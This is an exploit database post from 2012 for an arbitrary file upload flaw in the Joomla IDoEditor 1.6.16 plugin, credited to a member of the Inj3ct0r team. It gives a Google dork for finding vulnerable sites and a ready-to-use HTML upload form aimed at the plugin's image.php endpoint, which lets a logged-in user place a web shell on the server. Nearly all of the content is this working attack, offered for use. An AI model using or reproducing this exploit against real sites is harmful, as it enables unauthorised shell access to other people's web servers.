Home / exploits Joomla IDoEditor 1.6.16 Shell Upload
Posted on 13 June 2012
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm Sammy FORGIT member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ################################################## # Description : Joomla Editor - IDoEditor Arbitrary File Upload Vulnerability # Version : 1.6.16 # Link : http://idoitbetter.org/project/idoeditor/profile.html # Software : http://idoitbetter.org/download.html?task=viewcategory&catid=3 # Date : 08-06-2012 # Google Dork : inurl:/images/idoblog/upload # Site : 1337day.com Inj3ct0r Exploit Database # Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr ################################################## Exploit : Requirements : simple user account valid and logged upload.html <html> <body> <center> <form action="http://www.exemple.com/plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> <input type="file" name="pfile"> <input type="submit" name="Submit" value="Upload"> </form> </center> </body> </html> Shell access : upload.html output # Site : 1337day.com Inj3ct0r Exploit Database
